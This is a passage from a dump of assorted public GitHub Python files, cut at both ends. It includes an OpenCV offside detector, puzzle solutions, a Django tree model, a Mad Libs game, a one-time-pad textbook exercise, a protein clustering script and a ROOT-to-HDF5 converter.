cnt_thresh:\n break\n x, y, w, h = cv2.boundingRect(c[i])\n h += 5\n y -= 5\n if h < 0.9 * w:\n continue\n elif h / float(w) > 3:\n continue\n\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n M = cv2.moments(c[i])\n center = (int(M[\"m10\"] / M[\"m00\"]), int(M[\"m01\"] / M[\"m00\"]))\n\n foot = (center[0], int(center[1] + h * 1.2))\n\n teamB.append(foot)\n cv2.circle(frame, foot, 5, (0, 0, 255), -1)\n\n\ndef selectPoints(event, x, y, flag, param):\n global pts, frame, orig_frame\n\n if event == cv2.EVENT_LBUTTONUP:\n if len(pts) < 8:\n pts.append([x, y])\n cv2.circle(frame, (x, y), 5, (0, 0, 255), -1)\n else:\n print('You have already selected 4 points')\n\n\ndef getBoundaryPoints():\n global frame, pts\n end_pts = []\n cv2.namedWindow('input field')\n cv2.setMouseCallback('input field', selectPoints)\n while True:\n cv2.imshow('input field', frame)\n key = cv2.waitKey(1) & 0xFF\n if len(pts) >= 8:\n pts = np.array(pts, dtype=np.float32)\n pts[:, 1] *= (-1)\n for i in range(0, 5, 2):\n m1 = (pts[i + 1][1] - pts[i][1]) / (pts[i + 1][0] - pts[i][0])\n m2 = (pts[i + 3][1] - pts[i + 2][1]) / (pts[i + 3][0] - pts[i + 2][0])\n A = np.array([[m1, -1], [m2, -1]])\n A_inv = np.linalg.inv(A)\n B = np.array([pts[i][1] - m1 * pts[i][0], pts[i + 2][1] - m2 * pts[i + 2][0]])\n B *= (-1)\n p = np.dot(A_inv, B)\n end_pts.append(np.int16(p))\n m1 = (pts[7][1] - pts[6][1]) / (pts[7][0] - pts[6][0])\n m2 = (pts[1][1] - pts[0][1]) / (pts[1][0] - pts[0][0])\n A = np.array([[m1, -1], [m2, -1]])\n A_inv = np.linalg.inv(A)\n B = np.array([pts[6][1] - m1 * pts[6][0], pts[0][1] - m2 * pts[0][0]])\n B *= (-1)\n p = np.dot(A_inv, B)\n end_pts.append(np.int16(p))\n end_pts = np.array(end_pts)\n end_pts[:, 1] *= (-1)\n break\n elif key == ord(\"q\"):\n break\n cv2.destroyWindow('input field')\n return end_pts\n\n\ndef getCoordinates():\n\n global M, teamA, teamB, op, teamB_new, teamA_new, ball_new, ball_center\n teamB_new = np.array([])\n teamA_new = np.array([])\n op = orig_op.copy()\n if ball_center is not None:\n new = np.dot(M, [ball_center[0], ball_center[1], 1])\n ball_new = [new[0] / new[2], new[1] / new[2]]\n op = cv2.circle(op, (int(ball_new[0]), int(ball_new[1])), 3, (255, 0, 0), -1)\n\n if len(teamB) > 0:\n for i in range(len(teamB)):\n new_pt = np.dot(M, [teamB[i][0], teamB[i][1], 1])\n teamB_new = np.append(teamB_new, [new_pt[0] / new_pt[2], new_pt[1] / new_pt[2]])\n\n teamB_new = np.int16(teamB_new).reshape(-1, 2)\n for i in range(len(teamB)):\n op = cv2.circle(op, (teamB_new[i][0], teamB_new[i][1]), 5, (0, 255, 0), -1)\n\n if len(teamA) > 0:\n for i in range(len(teamA)):\n new_pt = np.dot(M, [teamA[i][0], teamA[i][1], 1])\n teamA_new = np.append(teamA_new, [new_pt[0] / new_pt[2], new_pt[1] / new_pt[2]])\n\n teamA_new = np.int16(teamA_new).reshape(-1, 2)\n for i in range(len(teamA)):\n op = cv2.circle(op, (teamA_new[i][0], teamA_new[i][1]), 5, (0, 0, 255), -1)\n\n\ndef drawOffsideLine():\n global M, teamB_new, op, frame\n if len(teamB_new) > 0:\n M_inv = np.linalg.inv(M)\n last_def = np.argmin(teamB_new[:,0])\n p1 = np.dot(M_inv, [teamB_new[last_def][0], 0, 1])\n p2 = np.dot(M_inv, [teamB_new[last_def][0], op.shape[0] - 1, 1])\n\n pts = [(int(p1[0] / p1[2]), int(p1[1] / p1[2])), (int(p2[0] / p2[2]), int(p2[1] / p2[2]))]\n frame = cv2.line(frame, pts[0], pts[1], (255, 0, 0), 2)\n\n\ndef closest_node(node, nodes):\n nodes = np.asarray(nodes)\n node = np.array([node[0], node[1]])\n # print(nodes)\n # print(node)\n dist_2 = np.sum((nodes - node) ** 2, axis=1)\n\n return np.argmin(dist_2)\n\n\ndef detectPasser():\n global ball_new, teamA, teamB, passerIndex, team, minDist\n teamA_min_ind = closest_node(ball_new, teamA_new)\n teamB_min_ind = closest_node(ball_new, teamB_new)\n # print(np.asarray(teamA[teamA_min_ind]))\n # print(np.asarray(ball_center))\n teamA_min = np.sum(([np.asarray(teamA_new[teamA_min_ind])] - np.asarray(ball_new)) ** 2, axis=1)\n teamB_min = np.sum(([np.asarray(teamB_new[teamB_min_ind])] - np.asarray(ball_new)) ** 2, axis=1)\n minDist = min(teamB_min, teamA_min)\n if (teamA_min < teamB_min):\n # print(\"Ball passed by TeamA player\")\n\n passerIndex = teamA_min_ind\n # print(passerIndex)\n team = 'A'\n else:\n # print(\"Ball passed by TeamB player\")\n passerIndex = teamB_min_ind\n team = 'B'\n\n\ndef detectOffside():\n global teamA_new, teamB_new, passerIndex\n if len(teamB_new) > 0:\n if len(teamA_new) > 0:\n # teamA_new.sort()\n teamB_new.sort()\n # print(teamA_new)\n if (teamB_new[0][0] > teamA_new[passerIndex][0]):\n # if (teamB[0][0] > teamA[passerIndex][0]):\n # print(passerIndex)\n # Assuming no goalie\n print('Offside')\n else:\n print('Not Offside')\n else:\n print('Not Offside')\n else:\n print('Not Offside')\n\n\n\nif __name__ == '__main__':\n args = track_utils.getArguements()\n\n if not args.get(\"video\", False):\n camera = cv2.VideoCapture(0)\n else:\n camera = cv2.VideoCapture(args[\"video\"])\n\n orig_op = cv2.imread('soccer_half_field.jpeg')\n op = orig_op.copy()\n fgbg = cv2.createBackgroundSubtractorMOG2(history=20, detectShadows=False)\n flag = False\n\n while True:\n (grabbed, frame) = camera.read()\n\n if args.get(\"video\") and not grabbed:\n break\n\n frame = track_utils.resize(frame, width=400)\n\n orig_frame = frame.copy()\n\n frame2 = track_utils.removeBG(orig_frame.copy(), fgbg)\n\n detectPlayers()\n\n if roi is not None:\n ball_center, cnt = track_utils.detectBallThresh(frame2, limits)\n if cnt is not None:\n (x, y), radius = cv2.minEnclosingCircle(cnt)\n cv2.circle(frame, (int(x), int(y)), int(radius), (255, 255, 0), 2)\n cv2.circle(frame, ball_center, 2, (0, 0, 255), -1)\n trackBall()\n\n if M is not None:\n src = np.int32(src)\n\n for i in range(4):\n frame = cv2.circle(frame.copy(), (src[i][0], src[i][1]), 3, (255, 0, 255), -1)\n\n cv2.polylines(frame, np.int32([src]), True, (255, 0, 0), 2, cv2.LINE_AA)\n\n getCoordinates()\n\n drawOffsideLine()\n\n cv2.imshow('camera view', frame)\n cv2.imshow('top view', op)\n\n if flag:\n t = 1\n else:\n t = 100\n\n key = cv2.waitKey(t) & 0xFF\n\n if key == ord(\"q\"):\n break\n elif key == ord('i') and (roi_hist_A is None or roi_hist_B is None):\n flag = True\n roi_hist_A, roi_hist_B = track_utils.getHist(frame)\n\n roi = track_utils.getROIvid(orig_frame, 'input ball')\n if roi is not None:\n limits = track_utils.getLimits(roi)\n\n src = getBoundaryPoints()\n src = np.float32(src)\n dst = np.float32([[0, 0], [0, op.shape[0]], [op.shape[1], op.shape[0]], [op.shape[1], 0]])\n M = cv2.getPerspectiveTransform(src, dst)\n\n camera.release()\n cv2.destroyAllWindows()\n","repo_name":"kparth98/ITSP-Project","sub_path":"Offside_detection.py","file_name":"Offside_detection.py","file_ext":"py","file_size_in_byte":12293,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"23560686761","text":"from __future__ import print_function\nimport sys\n\ndef tidy(t):\n for i in range(len(t)-1, -1, -1):\n lte = True\n for j in range(i, len(t)):\n if t[i] > t[j]:\n lte = False\n break\n if not lte:\n front = t[:i]\n middle = str(int(t[i]) - 1)\n end = '9' * (len(t) - i - 1)\n t = front + (middle if middle != \"0\" else \"\") + end\n return t\n\ndata = sys.stdin.readlines()\n\nn = int(data[0])\n\nfor i in range(1, 1 + n):\n line = data[i].strip()\n print(\"Case #{}: {}\".format(i, tidy(line)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/4139.py","file_name":"4139.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33078549614","text":"import numpy as np\nimport cv2 as cv\ncap = cv.VideoCapture('walk.avi')\n#kernel=cv.getStructuringElement(cv.MORPH_ELLIPSE,(3,3))\nfgbg = cv.createBackgroundSubtractorKNN(detectShadows=False)\nwhile(1):\n ret, frame = cap.read()\n fgmask = fgbg.apply(frame)\n #fgmask=cv.morphologyEx(fgmask,cv.MORPH_OPEN,kernel)\n cv.imshow('frame',fgmask)\n k = cv.waitKey(30) & 0xff\n if k == 27:\n break\ncap.release()\ncv.destroyAllWindows()\n","repo_name":"akshitagupta15june/opencv","sub_path":"background_substraction.py","file_name":"background_substraction.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"41930411621","text":"from django.db import models\nfrom django.contrib.auth import get_user_model \nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom file_manager_mptt.utils.node_types import NODE_TYPE, FOLDER, FILE\nfrom file_manager_mptt.exceptions.file_node_exception import FileNodeException\nfrom file_manager_mptt.exceptions.errors import Errors\nfrom file_manager_mptt.helpers.general_functions import unique_slug_generator\nimport uuid\n# Create your models here.\n\n## identifiers\n\nclass FileMpttModel(MPTTModel):\n\n id = models.UUIDField(verbose_name=\"File Node ID\", primary_key=True, default=uuid.uuid4, editable=False)\n name = models.CharField(max_length=100)\n parent = TreeForeignKey('self', null=True, related_name='children', on_delete=models.CASCADE)\n type = models.IntegerField(choices=NODE_TYPE)\n slug = models.SlugField(max_length=500, unique=True, blank=True)\n owner = models.ForeignKey(get_user_model(), related_name='volumen', on_delete=models.PROTECT)\n deleted = models.BooleanField(default=False)\n\n created_date = models.DateTimeField(auto_now_add=True)\n updated_date = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n \n\n def is_folder(self):\n return self.type == FOLDER\n\n\n def is_file(self):\n return self.type == FILE\n\n\n def get_children(self, *args, **kwargs):\n filters = dict(**kwargs)\n return super().get_children().filter(**filters)\n \n\n def slug_generator(self):\n return unique_slug_generator(self)\n\n \n\n def save(self, *args, **kwargs):\n \n if not self.created_date:\n self.slug = self.slug_generator()\n\n if self.parent and self.parent.is_file():\n raise FileNodeException(Errors._FILE_CANNOT_HAVE_CHILDREN)\n \n\n super(FileMpttModel, self).save(*args, **kwargs) \n\n","repo_name":"Agent-Hellboy/file-manager-mptt","sub_path":"file_manager_mptt/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13482986308","text":"# MAD LIBS\n\n# SPECIFICATIONS: Create a program that contains a script with some lines left blank for user input.\n# Prompt the user for input to fill in the blanks, asking for appropriate parts of speech.\n# After the user has entered in their contents, print out the story script with their entries to reveal\n# their unique (and probably hilarious) story. Advanced Features: 1. A loop that allows them to play the\n# game continuously, 2. A menu bar with 2-3 story templates to choose from, 3. color-coded words to\n# differentiate the user-input words from the story script.\n\n\ndef story1():\n import time\n\n blue = \"\\033[0;34m\"\n end = \"\\033[0m\"\n\n print('\\nLet\\'s get started!')\n time.sleep(1)\n print('Please add some of your own words to make this story uniquely your own ...\\n')\n time.sleep(1)\n\n adj = blue + input('Adjective: ') + end\n animal = blue + input('Animal: ') + end\n country = blue + input('Country: ') + end\n name = blue + input('Name: ') + end\n foods = blue + input('Foods (plural): ') + end\n\n story_1 = f'''\\nThere once was a {adj} {animal} named, {name}. It lived in the country {country}, \nand for all its life it always grazed on {foods}. How peaceful . . . yet boring. The end.'''\n print('Generating story ...')\n time.sleep(3)\n for letter in story_1:\n print(letter, end='')\n time.sleep(.09)\n\n\ndef story2():\n blue = \"\\033[0;34m\"\n end = \"\\033[0m\"\n\n print('\\nLet\\'s get started!')\n time.sleep(1)\n print('Please add some of your own words to make this story uniquely your own ...\\n')\n time.sleep(1)\n\n noun = blue + input('Noun: ') + end\n name1 = blue + input('Name: ') + end\n adj = blue + input('Adjective: ') + end\n place = blue + input('Place (plural): ') + end\n name2 = blue + input('Another name: ') + end\n\n story_2 = f'''\\nOnce there was a {noun} named {name1}. {name1} lived in a big {adj} \nhouse with its grandmother {name2}. One day the {noun} {name1} and {noun} Grandma {name2} \nwanted to go out. \\\"Where do you want to go today, {name1}?\\\", asked Grandma {name2}. \n\\\"I want to go to {place},\\\" said {name1}. And then they did go to {place}. \nThey surely, surely did.'''\n print('Generating story ...')\n time.sleep(3)\n for letter in story_2:\n print(letter, end='')\n time.sleep(.09)\n\n\ndef story3():\n blue = \"\\033[0;34m\"\n end = \"\\033[0m\"\n\n print('\\nLet\\'s get started!')\n time.sleep(1)\n print('Please add some of your own words to make this story uniquely your own ...\\n')\n time.sleep(1)\n\n happyplace = blue + input('Happy place: ') + end\n homeplace = blue + input('Place in a home: ') + end\n plang1 = blue + input('Programming Language: ') + end\n name = blue + input('Name: ') + end\n plang2 = blue + input('Another programming language: ') + end\n\n story_3 = f'''\\nThere once was a coder named {name}. {name} was such a hacker, and {name} \njust coded and learned, and couldn't be stopped. First, {name} learned {plang1}. Then {name} \nlearned {plang2}. After that {name} felt like they deserved a reward, so they went to \n{happyplace}. But as they were getting ready, they were so tired that they fell asleep, \nright there in their {homeplace}. EL FIN!'''\n print('Generating story ...')\n time.sleep(3)\n for letter in story_3:\n print(letter, end='')\n time.sleep(.09)\n\n\nimport time\n\nwhile True:\n print('Hello! Welcome to Mad Libs!')\n time.sleep(1)\n print('To get started, please choose your story ...\\n')\n time.sleep(1)\n print('OPTION 1: The Unexpected Fruit of No Labor')\n time.sleep(1)\n print('OPTION 2: Grandma')\n time.sleep(1)\n print('OPTION 3: A True Exhaustion Story')\n time.sleep(1)\n while True:\n story = input('Please enter 1, 2, or 3 for your story choice: ')\n if story == '1':\n story1()\n break\n if story == '2':\n story2()\n break\n if story == '3':\n story3()\n break\n else:\n print('Please enter the number 1, 2, or 3 as your story option. No funny business!')\n continue\n\n restart = input('\\n\\nThanks for playing Mad Libs! Would you like to play again? ')\n if restart.lower() == 'yes' or restart.lower() == 'y':\n print('\\n')\n continue\n else:\n print('\\nCome back any time!')\n break\nquit()\n","repo_name":"larebear007/Mad_Libs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12273344420","text":"import string\n\ndef next_bin_number(n):\n bin_list = list(n)\n for i in range(len(bin_list) - 1, -1, -1):\n if bin_list[i] == \"0\":\n bin_list[i] = \"1\"\n break\n else:\n bin_list[i] = \"0\"\n return ''.join(bin_list)\n\ndef G2F_add(a, b):\n if a == '1' and b == '1':\n return '0'\n if a == '0' and b == '0':\n return '0'\n return '1'\n\ndef decrypt(encoded_string, key, bin2char):\n decrypted_string = \"\"\n for i in range(0,55):\n decrypted_string += G2F_add(encoded_string[i], key[i%5])\n readable = \"\"\n for i in range(0,55,5):\n if decrypted_string[i:i+5] in bin2char:\n readable += bin2char[decrypted_string[i:i+5]]\n else:\n return\n if 'e' in readable and ' ' in readable: #reduce the possibilities by assuming an e and space\n print(readable)\n\n\nletters = list(string.ascii_lowercase)\nletters.append(' ')\nencoded_string = \"1010100100101010101111001000110101110101001001100111010\"\nkey = \"00000\"\n\nchar2bin = {}\nstart = \"00000\"\nfor char in letters:\n char2bin[char] = start\n start = next_bin_number(start)\n\nbin2char = {v: k for k, v in char2bin.items()}\n\ndecrypt(encoded_string, key, bin2char)\nwhile key != \"11111\":\n key = next_bin_number(key)\n decrypt(encoded_string, key, bin2char)\n\n","repo_name":"PhilipKlein/CodingTheMatrix","sub_path":"TheField/one_time_pad.py","file_name":"one_time_pad.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1764429079","text":"from dataclasses import dataclass, field\nfrom typing import List\nfrom math import prod\n\n@dataclass\nclass TreeLine:\n line_o_trees: List[bool]\n\n@dataclass\nclass Treemap:\n tree_line: List[TreeLine]\n\n@dataclass\nclass Slope:\n Right: int\n Down: int\n\n\n\n\ndef process_line(line: str) -> TreeLine:\n # You make a map (your puzzle input) of the open squares (.) and trees (#) you can see.\n is_tree = '#'\n line_o_trees = []\n for char in line:\n if char == is_tree:\n line_o_trees.append(True)\n elif char == '.':\n line_o_trees.append(False)\n else:\n pass\n return TreeLine(line_o_trees)\n\nwith open('input/input.txt','r', newline='\\n') as file:\n lines = file.readlines()\n treemap = Treemap([])\n for line in lines:\n print(line)\n treemap.tree_line.append(process_line(line))\n\n # You start on the open square (.) in the top-left corner\n right_num = 0\n tree_hit_num = 0\n tree_mod = len(treemap.tree_line[0].line_o_trees)\n for tree_line in treemap.tree_line:\n right_num_w_mod = right_num % tree_mod\n print(tree_line, f'checking line on index {right_num_w_mod}')\n if tree_line.line_o_trees[right_num_w_mod]:\n # how many trees would you encounter?\n tree_hit_num += 1\n print('hit a tree on line')\n # The toboggan can only follow a few specific slopes\n # (you opted for a cheaper model that prefers rational numbers);\n # start by counting all the trees you would encounter for the slope right 3, down 1\n right_num += 3\n print(f'to get to the bottom you encounter {tree_hit_num} trees')\n\n # Determine the number of trees you would encounter if, for each of the following slopes\n slopes = [\n Slope(1,1),\n Slope(3, 1),\n Slope(5, 1),\n Slope(7, 1),\n Slope(1, 2)\n ]\n\n tree_hit_nums = []\n for slope in slopes:\n right_num = 0\n tree_hit_num = 0\n for ix, tree_line in enumerate(treemap.tree_line):\n if ix == 0 or ix % slope.Down == 0:\n right_num_w_mod = right_num % tree_mod\n # print(tree_line, f'checking line on index {right_num_w_mod}')\n if tree_line.line_o_trees[right_num_w_mod]:\n # how many trees would you encounter?\n tree_hit_num += 1\n # The toboggan can only follow a few specific slopes\n # (you opted for a cheaper model that prefers rational numbers);\n # start by counting all the trees you would encounter for the slope right 3, down 1\n right_num += slope.Right\n print(f'to get to the bottom you encounter {tree_hit_num} trees for Right {slope.Right} and Down {slope.Down} ')\n tree_hit_nums.append(tree_hit_num)\n print(f'The multiple of all the answers is {prod(tree_hit_nums)}')","repo_name":"Spasnof/advent2020","sub_path":"day/3/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34785951725","text":"raise NotImplementedError('*** this tutorial is out of date. ***')\n\n\nclass Flow:\n class Data:\n def __init__(self, value=None, address=None):\n self.value = value\n self.address = address\n\n class State:\n def __init__(self, frequency=0, cost=0.5):\n self.frequency = frequency\n self.cost = cost\n\ndataflow = Flow.Data\ncomputeflow = Flow.State\n\ndflow = dataflow()\ncflow = computeflow()\n\nprint(dflow.address, dflow.value)\nprint(cflow.frequency, cflow.cost)\nprint('end tutorial')","repo_name":"STEllAR-GROUP/phyfleaux","sub_path":"tutorial/hello-phyflow.py","file_name":"hello-phyflow.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30529903665","text":"import pandas as pd\nfrom sklearn.metrics.pairwise import pairwise_distances\nfrom scipy import io, sparse\nimport csv\n\n# Get organism ID from protein id \ndef get_organism(s):\n head = s.split('.')[0].rstrip('0123456789')\n return head\n\n# If cosine distance less than this threshold, cluster proteins together\nclustering_threshold = 0.6\n\n# Format input and output\ndata_folder = '/Users/matthewthompson/Documents/UAMS_SURF/K-mer_testing/CSV_files/staph/'\ninput_description = 'staph_3mer_top_9'\noutput_description = input_description + '_' + str(clustering_threshold)\n\n# Read in k-mer count matrix (output from kmerSelector.py)\nsparse_matrix = io.mmread(data_folder + input_description + '.mtx')\nprint(\"Converting to csr_matrix\")\ndf = sparse.csr_matrix(sparse_matrix)\n\n# Proteins are index, kmers are columns\ndf = df.transpose()\n\n# Read in proteins (output from kmerSelector.py)\nproteins = pd.read_csv(data_folder + input_description + '_protein_list.csv')\n\n# Calculate and format distance matrix\nprint(\"Pairwise distance calculation\")\npairwise_distances = pd.DataFrame(pairwise_distances(df, metric='cosine'))\npairwise_distances.columns = proteins.columns\npairwise_distances.index = proteins.columns\n\nelligible = list(pairwise_distances.columns)\n\n# Make a list of precluster centers\n# Make a sub dataframe with 100 proteins\nsubset_columns = elligible[0:101]\n# Reduce the distance matrix to the 100 proteins\nsubset_distances = pairwise_distances[subset_columns]\n# Isolate the 100% duplicate rows across 100 proteins\nsubset_duplicates = subset_distances[subset_distances.duplicated(keep = False)]\n# List of 100% identical proteins\neligible_proteins = list(subset_duplicates.index)\n# Reduce duplicate rows to unique points \ncluster_centers = subset_duplicates.drop_duplicates()\n\nused_points = []\npreclusters = dict()\ncluster_centers = list(cluster_centers.index)\ni = 1\nprint(\"Preclustering exact duplicates\")\nwhile len(cluster_centers) != 0:\n cluster_center = cluster_centers.pop()\n sorted_distances = pairwise_distances.loc[cluster_center].sort_values()\n available_points = sorted_distances[~sorted_distances.index.isin(used_points)]\n identical_points = list(available_points[available_points == 0].index)\n points_under_threshold = list(available_points[available_points < clustering_threshold].index)\n used_points = used_points + points_under_threshold\n used_points.append(cluster_center)\n used_points = list(set(used_points))\n cluster_centers = list(set(cluster_centers) - set(used_points))\n preclusters['clus_' + str(i)] = points_under_threshold\n i+=1\n\npoints_not_in_precluster = list(set(elligible) - set(used_points))\n\n# Store these variables for reference\npoints_without_duplicates = points_not_in_precluster\npoints_with_duplicates = used_points\n\nclusters = dict()\npossible_cluster_centers = points_not_in_precluster\nprint(\"Clustering non-duplicate genes\")\nwhile len(possible_cluster_centers) != 0:\n cluster_center = possible_cluster_centers.pop()\n sorted_distances = pairwise_distances.loc[cluster_center].sort_values()\n available_points = sorted_distances[~sorted_distances.index.isin(used_points)]\n points_under_clustering_threshold = list(available_points[available_points < clustering_threshold].index)\n used_points = used_points + points_under_clustering_threshold\n #used_points.append(cluster_center)\n used_points = list(set(used_points))\n possible_cluster_centers = list(set(possible_cluster_centers) - set(used_points))\n clusters['clus_' + str(i)] = points_under_clustering_threshold\n i+=1\n\n# Remove empty clusters\nnon_empty_clusters = dict()\nfor cluster_center in list(clusters.keys()):\n cluster = clusters[cluster_center]\n if len(cluster) > 0:\n non_empty_clusters[cluster_center] = cluster\n\ntotal_clusters = {**preclusters, **non_empty_clusters}\n\n'''\norganism_count = dict()\nfor cluster_center in total_clusters.keys():\n cluster = total_clusters[cluster_center]\n org_list = [get_organism(protein) for protein in cluster]\n org_list = list(set(org_list))\n organism_count[cluster_center] = pd.Series(org_list).value_counts()\n \norganism_count = pd.DataFrame(organism_count)\n\ndf_100 = organism_count.dropna(axis = 1, thresh = 14)\ndf_93 = organism_count.dropna(axis = 1, thresh = 13)\ndf_85 = organism_count.dropna(axis = 1, thresh = 12) \n'''\n\ngrouping_list = dict()\ni = 1\n\n# Reformat clusters for output\nprint(\"Formatting clusters\")\nfor cluster_center in total_clusters.keys():\n formatted_clusters = dict()\n formatted_clusters['c'] = i\n formatted_clusters['points'] = total_clusters[cluster_center]\n clusters[i] = formatted_clusters\n for protein in formatted_clusters['points']:\n grouping_list[protein] = i\n i += 1\n\n# Get ordering of genes (output from kmerCounter.R) to assist with data import into FindMyFriends (grouping.R)\nordered_gene_list = list(pd.read_csv(data_folder + 'find_my_friends_gene_ordering_list.csv')['x'])\n\n# Create list of cluster membership for each protein for output\nout_list = []\nfor entry in ordered_gene_list:\n out_list.append(str(grouping_list[str(entry).strip()]))\ndf_out = pd.DataFrame()\ndf_out['gene'] = ordered_gene_list\ndf_out['clust'] = out_list\n\n# Write cluster membership for each protein (input for grouping.R)\ndf_out.to_csv(data_folder + output_description + '_grouping_list.csv', index = None)\n\n# Write clusters out for comparison with UCLUST\nwith open(data_folder + output_description + '_clusters.txt', 'w') as csv_file:\n writer = csv.writer(csv_file)\n for key, value in total_clusters.items():\n writer.writerow([key, value])","repo_name":"mdttrump97/Kmer_pangenomes","sub_path":"canopyClustering.py","file_name":"canopyClustering.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24583669423","text":"from collections import deque\n\na, b = map(int, input().strip().split(' '))\nmes = deque([int(input()) for _ in range(a)])\ncon = [0] * b\n\nfor i in range(b):\n con[i] = mes.popleft()\n\nwhile mes:\n cur = mes.popleft()\n idx = 0\n val = 9999\n for i in range(b):\n if con[i] < val:\n val = con[i]\n idx = i\n con[idx] += cur\n\nprint(max(con))\n","repo_name":"seoul-ssafy-class-2-studyclub/Indong-python","sub_path":"Python/SWEA/SW_TEST/line_01.py","file_name":"line_01.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4497783877","text":"from tqdm import tqdm\nimport argparse\nimport uproot\nimport numpy as np\nimport h5py\n\ndef reader(input_path, nevents=-1, firstevent=0, tree_name=\"\", light=False):\n \n rootfile = uproot.open(input_path)\n if len(rootfile.keys()) == 0:\n raise Exception(f\"Input file {input_path} contains no keys\")\n if tree_name==\"\":\n tree_name = rootfile.keys()[0]\n print(f\"Reading tree {tree_name} ...\")\n tree = rootfile[tree_name]\n\n if nevents<0:\n nevents = tree.num_entries\n lastevent = min(tree.num_entries, firstevent + nevents)\n\n data_array = {}\n\n for branch_name in tree.keys():\n\n arr = tree[branch_name].array(library=\"np\", entry_stop=lastevent,entry_start=firstevent)\n\n if isinstance(arr[0],uproot.STLVector):\n\n if light: #skip branches containing 2D arrays\n continue\n\n arr = np.array([ #branch\n np.array([ #event\n np.array( #row\n np.array(row.tolist() if len(row)!=0 else [np.NaN]) #column\n )\n for row in event\n ],dtype=object)\n for event in arr\n ],dtype=object)\n\n data_array[branch_name] = arr\n \n return data_array\n\ndef pad_array(arr,_max_length = (-1,-1)):\n\n if arr[0].dtype==object and hasattr(arr[0][0], '__iter__'): #array of 2-dimensional arrays\n pad_with = np.NaN if arr[0][0].dtype.kind == 'f' else -9999\n lengths_0 = [len(event) for event in arr]\n lengths_1 = [ [len(node) for node in event] for event in arr]\n max_length_0 = max(lengths_0) if _max_length[0] < 0 else _max_length[0]\n max_length_1 = max([max(node_lengths) if len(node_lengths)!=0 else 0 for node_lengths in lengths_1]) if _max_length[1] < 0 else _max_length[1]\n\n padded_arr = np.stack([\n np.pad(\n pad_array(event,(max_length_1,-1)),\n [(0, max_length_0 - lengths_0[idx]),(0,0)],\n \"constant\",\n constant_values = pad_with\n )\n for idx, event in enumerate(arr)\n ]).astype('float32')\n\n else:\n pad_with = np.NaN if arr[0].dtype.kind == 'f' else -9999\n lengths = [len(event) for event in arr]\n max_length = max(lengths) if _max_length[0] < 0 else _max_length[0]\n\n padded_arr = np.stack([\n np.pad(\n event, \n (0, max_length - lengths[idx]),\n \"constant\",\n constant_values = pad_with\n )\n for idx, event in enumerate(arr)\n ])\n\n return padded_arr\n\ndef writer(output_path,data_array,save_jagged=True):\n\n file = h5py.File(output_path, 'w')\n\n print(\"Writing branches...\")\n for branch_name, branch_array in tqdm(data_array.items()):\n num_entries = len(branch_array)\n\n # for saving jagged arrays, see https://docs.h5py.org/en/stable/special.html#arbitrary-vlen-data\n # (not supported for branches storing 2D arrays)\n if save_jagged and branch_array[0].dtype!=object:\n shape = (num_entries, )\n dt = h5py.vlen_dtype(np.dtype('float32'))\n\n else:\n branch_array = pad_array(branch_array)\n shape = branch_array.shape\n dt = type(branch_array[0][0][0])\n\n dataset = file.create_dataset(\n branch_name,\n shape,\n dtype=dt,\n compression=\"gzip\",\n chunks=True)\n\n for idx,event in enumerate(branch_array):\n dataset[idx] = event\n\n file.close()\n print(\"Output written to \",output_path)\n\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\",\"--input\", dest=\"input\", type=str, help=\"path to input ROOT file\", required=True)\n parser.add_argument(\"-t\",\"--tree\", dest=\"tree\", type=str, help=\"name of TTree\", default=\"\")\n parser.add_argument(\"-o\",\"--output\", dest=\"output\", type=str, help=\"path to output h5 file\", default=\"\")\n parser.add_argument(\"-n\",\"--nevents\", dest=\"nevents\", type=int, help=\"number of events to parse\", default=-1)\n parser.add_argument(\"-s\",\"--start\", dest=\"start\", type=int, help=\"event to start on\", default=0)\n parser.add_argument(\"-j\",\"--jagged\", dest=\"save_jagged\", type=int, help=\"save output as jagged array (alternative is padded array)\", default=1)\n parser.add_argument(\"-l\",\"--light\", dest=\"light\", type=int, help=\"do not save expensive branches containing 2D arrays\", default=0)\n args = parser.parse_args()\n\n if args.output == \"\":\n args.output = args.input.replace(\".root\",\".h5\")\n\n data_array = reader(args.input, args.nevents, args.start, args.tree, bool(args.light))\n writer(args.output,data_array, bool(args.save_jagged))\n\nif __name__ == '__main__':\n main()","repo_name":"cocoa-hep/cocoa-hep","sub_path":"COCOA/util/dump_hdf5.py","file_name":"dump_hdf5.py","file_ext":"py","file_size_in_byte":4920,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"37855392431","text":"import sys\nimport unicodedata\n\n\nSTART_EMOJI_RANGE = 100000 # estimate\nNOT_FOUND = \"Not found\"\n\n\ndef what_means_emoji(emoji):\n \"\"\"Receives emoji and returns its meaning,\n in case of a TypeError return 'Not found'\"\"\"\n try:\n return unicodedata.name(emoji)\n except (TypeError, 